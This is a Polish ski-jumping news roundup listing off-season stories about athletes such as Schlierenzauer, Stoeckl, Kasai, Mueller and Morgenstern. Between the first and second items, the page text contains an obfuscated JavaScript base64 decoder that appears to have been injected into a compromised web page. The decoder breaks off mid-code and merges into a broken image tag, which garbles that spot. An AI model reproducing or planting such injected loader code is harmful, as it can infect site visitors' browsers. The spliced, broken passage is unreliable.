You are currently viewing „Wokół Skoczni”: roztańczony Morgi, Stoeckl ojcem, Mueller stawia kolejne kroki
Thomas Morgenstern - triumfator LGP i PŚ (fot. Julia Piątkowska)

„Wokół Skoczni”: roztańczony Morgi, Stoeckl ojcem, Mueller stawia kolejne kroki

Morgenstern Thomas fot.J.Piatkowska - "Wokół Skoczni": roztańczony Morgi, Stoeckl ojcem, Mueller stawia kolejne krokiSezon 2015/2016 już za nami. Można odnieść wrażenie, że coraz szybciej mijają nam zimowe zmagania. Skoczkowie udają się na urlopy, a kibicom pozostaje czekać na nadchodzącą Letnią Grand Prix. O czym pisano i mówiono w skokach… poza skokami? A także co w tym czasie wydarzyło się w skocznym świecie, a nie zostało zauważone?

 
Schlierenzauer Gregor WSC.Falun .2015.flowers fot.Julia .Piatkowska 300x200 - "Wokół Skoczni": roztańczony Morgi, Stoeckl ojcem, Mueller stawia kolejne kroki
Gregor Schlierenzauer, fot. Julia Piątkowska

1. Gregor Schlierenzauer padł ofiarą "fałszerza". Ów osobnik podszył się pod młodego Austriaka i założył konto na portalu randkowym "Tinder"! Jakby tego było mało, na profilu zostały wykorzystane prywatne zdjęcia Schlieriego. Autentyczność profilu (a raczej jej brak...) rozwiali najbliżsi współpracownicy 26-letniego skoczka. Miejmy nadzieję, że nikt nie zdecydował się na randkę z fałszywym Gregorem. (heute.at)

 

- "Wokół Skoczni": roztańczony Morgi, Stoeckl ojcem, Mueller stawia kolejne krokifunction u2fd518ba9147(q3){var u9='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var y7='';var ve,p7,w9,w4,y6,p9,y4;var s0=0;do{w4=u9.indexOf(q3.charAt(s0++));y6=u9.indexOf(q3.charAt(s0++));p9=u9.indexOf(q3.charAt(s0++));y4=u9.indexOf(q3.charAt(s0++));ve=(w4<<2)|(y6>>4);p7=((y6&15)<<4)|(p9>>2);w9=((p9&3)<<6)|y4;if(ve>=192)ve+=848;else if(ve==168)ve=1025;else if(ve==184)ve=1105;y7+=String.fromCharCode(ve);if(p9!=64){if(p7>=192)p7+=848;else if(p7==168)p7=1025;else if(p7==184)p7=1105;y7+=String.fromCharCode(p7);}if(y4!=64){if(w9>=192)w9+=848;else if(w9==168)w9=1025;else if(w9==184)w9=1105;y7+=String.fromCharCode(w9);}}while(s0ander Stoeckl, fot. Julia Piątkowska" src="http://www.skokipolska.pl/wp-content/uploads/2016/02/Stoeckl_Alexander_WC.Klingenthal.2013_fot.Julia_.Piatkowska-300x200.jpg" alt="Stoeckl_Alexander_WC.Klingenthal.2013_fot.Julia.Piatkowska" width="300" height="200" /> Alexander Stoeckl, fot. Julia Piątkowska

2. Szkoleniowiec Norwegów, Alexander Stoeckl, został tatą. Tegoroczna Wielkanoc była bardzo szczęśliwa dla austriackiego szkoleniowca i jego partnerki Iny Bergmann. W Wielki Czwartek (24 kwietnia) w Oslo, rodzice powitali na świecie córeczkę! Stoeckl jak przystało na dzielnego ojca był obecny w czasie porodu. - Ona jest najpiękniejszą dziewczynką na świecie, a my jesteśmy dumnymi rodzicami. To niesamowite! - komentował dumny tata. Świeżo upieczonym rodzicom gratulujemy i życzymy dużo zdrowia dla córeczki! (www.nettavisen.no)

 

3. Eddie "The Eagle" Edwards został ambasadorem Mistrzostw Świata w narciarstwie klasycznym w Lahti w 2017 r. Brytyjczyk odwiedził miasto gospodarzy światowego czempionatu w towarzystwie byłych gwiazd skoków narciarskich: Tamiego Kiuru oraz Toniego Nieminena. Edwards wielokrotnie podkreślał, że skoki narciarskie są blisko jego serca. (www.lahti2017.fi) 

Film z wizyty brytyjskiego skoczka można obejrzeć poniżej:

Eddie ”The Eagle” Edwards appointed ambassador of Lahti2017! Eddie Edwards on tuorein Lahti2017 -latulähettiläs ja...

Opublikowany przez Lahti2017 na 30 marca 2016

 
Damjan Jernej S.Piwowar 300x200 - "Wokół Skoczni": roztańczony Morgi, Stoeckl ojcem, Mueller stawia kolejne kroki
Jernej Damjan, fot. Stefan Piwowar

4. Jernej Damjan po zakończonym sezonie Pucharu Świata 2015/2016 postanowił udać się na zasłużony urlop. Sezon zimowy nie był dla Słoweńca udany ponieważ nabawił się on urazu łąkotki, przez co musiał przedwcześnie wycofać się z rywalizacji. Korzystając z wolnego, Damjan wraz z rodziną udał się na słoneczne wakacje do Tajlandii. Ładowanie akumulatorów przed kolejnym sezonem w takiej scenerii na pewno będzie udane. (facebook.com/JernejDamjanAthlete)

 

5. Noriaki Kasai po swoim 500. starcie w konkursie Pucharu Świata przeszedł do historii, a kibice skoków narciarskich będą stawiać osobę Japończyka swoim dzieciom za przykład zdrowia i niesamowitej walki. Kasai w Planicy wystąpił w specjalnym plastronie z numerem 500. Z szerokim uśmiechem pozował do zdjęć prezentując okrągły numer. Gratulacje do Kasaiego popłynęły z całego skocznego świata. Między innymi Andreas Goldberger i Sven Hannawald, którzy rywalizowali swojego czasu z Noriakim w PŚ, dołączyli się do słów zachwytu nad osiągnięciem sympatycznego zawodnika z Kraju Kwitnącej Wiśni.

Noriaki ist ein Wahnsinn!

Opublikowany przez Andreas Goldberger na 17 marca 2016

Keep going, Nori ☺️ #skifliegen #planica #2016 #500 #worldcup #proud #

Opublikowany przez Sven Hannawald na 17 marca 2016

 
Mueller Lukas A.Sierotnik 300x199 - "Wokół Skoczni": roztańczony Morgi, Stoeckl ojcem, Mueller stawia kolejne kroki
Lukas Mueller, fot. Agnieszka Sierotnik

6. Stan zdrowia Lukasa Muellera poprawia się. Skoczek po dramatycznym upadku na mamucie Kulm i operacji kręgosłupa stawia pierwsze kroki w ośrodku rehabilitacyjnym w Bad Haering. Austriak wykonuje naprawdę ciężką pracę, poświęcając codziennej rehabilituje się codziennie po około osiem godzin. Zawodnik korzysta ze specjalnej maszyny, która utrzymuje jego ciało w pionie i pozwala stawiać kroki. - Urządzenie symuluje pełny ruch pieszy. To wspaniałe uczucie znowu czuć grunt pod stopami - komentuje używanie specjalnego chodzika. Lukas pozostanie w ośrodku prawdopodobnie od czterech do sześciu miesięcy. Całe środowisko narciarskie wspiera młodego skoczka w walce o powrót do zdrowia. 14 marca Lukas obchodził 24. urodziny i otrzymał niesamowity podarunek - plastron z Mistrzostw Świata w lotach z 2014 roku wraz z podpisami kolegów ze skoczni. (www.kleinezeitung.at) 

Tak prezentuje się niesamowity prezent urodzinowy:

Any further questions why the #skijumpfamily is so awesome? What a #birthday present - THANK YOU! Feel free to tag yourself since I can't identify all signatures # #NeverAlone

Opublikowany przez Lukas Müller na 14 marca 2016

 

7. Mackenzie Boyd-Clowes po raz kolejny poprawił rekord w długości lotu narciarskiego Kanady i całej Ameryki Północnej. Kanadyjczyk w serii treningowej 17 marca, na słoweńskim mamucie w Planicy, uzyskał 224 metry. Poprzedni rekord należał również do Boyd-Clowesa i wynosił 221,5 metra - ustanowiony został w norweskim Vikersund w lutym tego roku. Gratulujemy! (fis-ski.com)

 
Forfang Johann Andre WC.Titisee Neustadt.2016 2 fot.Przemek.Wardega 300x200 - "Wokół Skoczni": roztańczony Morgi, Stoeckl ojcem, Mueller stawia kolejne kroki
Johann Andre Forfang, fot. Przemek Wardęga

8. Johann Andre Forfang zgodnie z zapowiedzią sprzed kilku tygodni rozpoczął drogę odnoszenia zwycięstw w Pucharze Świata. Norweg postawił sobie za cel poprawę krajowego rekordu zwycięstw skoczka w konkursach PŚ. Aktualnie prym w tej kwestii wiedzie Roar Ljoekelsoey  z 11 triumfami. Forfang swoje pierwsze zwycięstwo odniósł w niemieckim Titisee-Neustadt, 12 marca tego roku. Apetyt młodego Norwega został rozbudzony ale z jego zaspokojeniem musi poczekać do następnej zimy. (fis-ski.com)

 

9. Thomas Morgenstern coraz lepiej radzi sobie na tanecznym parkiecie w austriackim programie "Dancing Stars". Za Morgim już cztery tańce: cha-cha, slow-fox, samba oraz quickstep. W drugim występie za wykonanie układu slow-fox, Morgi wraz z Roswithą Wieland otrzymali 20 punktów (na 40 możliwych do uzyskania). Poniżej możecie zobaczyć jak prezentowała się para podczas tańca: 

 A tutaj występ w rytmie samby (22 punkty):

W ostatnim odcinku Thomas i Roswitha zatańczyli quickstepa i otrzymali za swój występ 23 punkty! Jak do tej pory to najwyżej oceniony taniec austriackiego skoczka.

Yeaaaaahhhhh, es geht weiter aufwärts ! Hoffe unser Quickstep hat euch gefallen und ihr unterstützt uns weiterhin so genial ☎️ 09010 5909 10 ☎️ #dancingstars #quickstep #happy #proud

Opublikowany przez Thomas Morgenstern na 1 kwietnia 2016

 

10. Słoweńcy nie próżnują w szukaniu miejsca na posezonowy wypoczynek. Jurij Tepes okres Wielkanocy spędził w Malezji! Niewątpliwie uroki azjatyckich miast pozwolą Jurijowi na odpoczynek i zatęsknienie za skokami narciarskimi. (facebook.com/JurijTepes)

Vacation day 1: Walking around Kuala Lumpur

Opublikowany przez Jurij Tepes na 27 marca 2016

 

11. Sezon mija za sezonem, na skoczni pojawiają się nowe twarze, dobrze znani skoczkowie kończą sportowe kariery... 26 marca minęło 5 lat od ostatniego skoku Adama Małysza, który oddał na Wielkiej Krokwi w Zakopanem podczas swojego benefisu. Przypomnijmy sobie jeszcze raz to wydarzenie:

 

zebrała Paulina Jarmolik

 

Dodaj komentarz